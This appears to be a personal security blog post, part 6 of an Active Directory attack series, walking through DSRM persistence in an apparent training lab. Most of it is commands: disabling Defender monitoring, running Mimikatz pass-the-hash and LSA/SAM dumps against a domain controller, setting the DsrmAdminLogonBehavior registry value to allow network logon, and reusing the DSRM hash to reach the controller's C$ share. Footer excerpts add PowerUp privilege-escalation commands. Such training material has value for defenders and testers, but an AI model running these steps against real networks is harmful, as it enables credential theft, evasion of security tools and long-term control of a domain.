Skip to main content

Domain dominance, DSRM attack - Part 6

 

When dc needs to be rebooted in safe mode, then it requires dsrm password. How we can abuse this? If we have domain admin privilege then we can change the logon behavior of this particular user (not rid 500) and then remotely logon to the dc as as administrator. By default the dsrm administrator is not allowed to logon over the network onto the dc. Sometimes system administrators set the same password for both the account. In that case you just need to enable remote login for the dsrm administrator account.

So what is the persistent time? Its very very long even more than the golden ticket. Because it is created when domain controller is promoted and not change frequently. Unless this password is change, you have persistent access on the dc.

Now go to your studentadmin machine where you are local admin. Launch a powershell session with admin privs.

Disable defender:

Set-MpPreference -DisableRealtimeMonitoring $true

. C:\AD\Tools\Invoke-Mimikatz.ps1

Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:<domain admin ntlm hash> /run:powershell.exe"'

Now another powershell session will open with domain admin privs. 

On that session type below:

$sess = New-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Enter-PSSession -Session $sess

Bypass amsi and disable defender there i mean in dc machine. Then exit.

Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess

Enter-PSSession -Session $sess (Mimikatz will be loaded on the memory of dc now)

Now you are in domain controller machine with the privs of domain admin.

Now you can type the below command:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

or

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Or you can follow this approach:

Now go to your studentadmin machine where you are local admin. Launch a powershell session with admin privs. 

Disable defender:

Set-MpPreference -DisableRealtimeMonitoring $true

. C:\AD\Tools\Invoke-Mimikatz.ps1

Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:<domain admin ntlm hash> /run:powershell.exe"'

Now another powershell session will open with domain admin privs.

From this shell type:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Both the above method will work just fine. The only difference is here we are not directly logging in to the dc.

Now from here you will get a local administrator account ntlm hash whose rid is 500. We are not talking about this user account. This is not DSRM user. DSRM user rid is also 500 but the hash is different. 

To get the DSRM user ntlm hash, from the same shell:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Or if you are in the DC using Enter-PSSession command then type only below:

To get the DSRM user ntlm hash:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

This is dsrm administrator account hash. Take the hash. 

Since it is local administrator to dc so we can pass the hash. But we need to change certain registry key value so that we can remotely log in using this dsrm administrator account. By default it is set to disabled. 

This is domain admin privs shell. So now log on to dc using Enter-PSSession or if you are already in dc using Enter-PSSession then type below:

Enter-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name DsrmAdminLogonBehavior -Value 2 -PropertyType DWORD -Verbose

or

Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name DsrmAdminLogonBehavior -Value 2

To view this:

Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"

Now open a powershell using with the local administrator privilege from studentadmin machine. Then run the following command. 

Disable defender here.

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:<ntlm hash of dsrm account>

A new powershell session will spawn up. 

ls \\dcorp-dc\c$

or

ls \\dcorp-dc.dollarcorp.moneycorp.local\c$

Enter-PSSession not works here because we are not forcing here kerberos authentication. 


Avi




Comments

Post a Comment

Popular posts from this blog

API hacking lab setup

 Follow the commands to install and configure API hacking lab: 1. Install kali linux and update all the packages.  apt update -y apt upgrade -y or apt dist-upgrade -y or apt full-upgrade -y If you face any problem regarding update, install cloud flare warp in the host machine, then again start updating packages in your kali vm.  2. Install and configure burpsuite professional.  After that open burpsuite and go to Extensions tab. Click on BAppStore. Search for Autorize extension, It will help us to automate authorization testing. Click on Download Jython from the right side. From Jython website click on Jython standalone JAR and save it. Go to Extensios > Extensions settings >  under Core extension settings find out Python environment on the right pane. Select the jython jar file that you just downloaded. Now again go to BAppStore and re-search for Autorize extension. You will see Install option this time after selecting Autorize extension. Install it. You ...
Post a Comment
Read more

Privilege Escalation Domain Level PowerUp - Part - 2

  Our target is first escalate our local privs to local admin level. Then we will hunt for to check we have the local admin privs to which other machines. Then we will check on those machines, any domain admin sessions are available or not.  Unquoted service path check: Get-WmiObject -class win32_service | Select-Object pathname From powerup: Get-ServiceUnquoted -Verbose Get services where the current user can write to its binary path or change arguments to the binary: Get-ModifiableServiceFile -Verbose Get the services whose configuration current user can modify, if you are in server operator group then you can do this: Get-ModifiableService -Verbose Or we can run all the above checks from using powerup.ps1 script: . .\PowerUp.ps1 Invoke-AllChecks help Invoke-ServiceAbuse -Examples Invoke-ServiceAbuse -Name AbyssWebServer -UserName dcorp\student15     (Here AbyssWebServer is the abuseable service name that you come to know after running Invoke-AllChecks command) Wh...
Post a Comment
Read more

How to use vim efficiently

  Here every command works in command mode . And if you need to write something then you need to go to Insert mode . Pressing i will take you to the insert mode.  1. Let's say you want to search something. For example you want to find avi keyword. Then first you need to go to the command mode by typing Esc . Now type /avi  (at the bottom) and hit enter. Press small n to forward this search pattern and press Shift N to go reverse.  2. Substitute something: :%s/old string/new string/g    (g for affecting globally) 3. If you want to pick the 1st letter of word then press w and last letter of word then press e .  4. yy means copy a single line. 2yy means copy double lines.  5. Shift P is for paste.  6. Shift D to delete a line or cut a line.  7. Press o to go a new line.  8. Press Home to go to the 1st letter of a line and End to go to the last letter of a line.  9. If you want to save the file then press wq! . 10. If ...
Post a Comment
Read more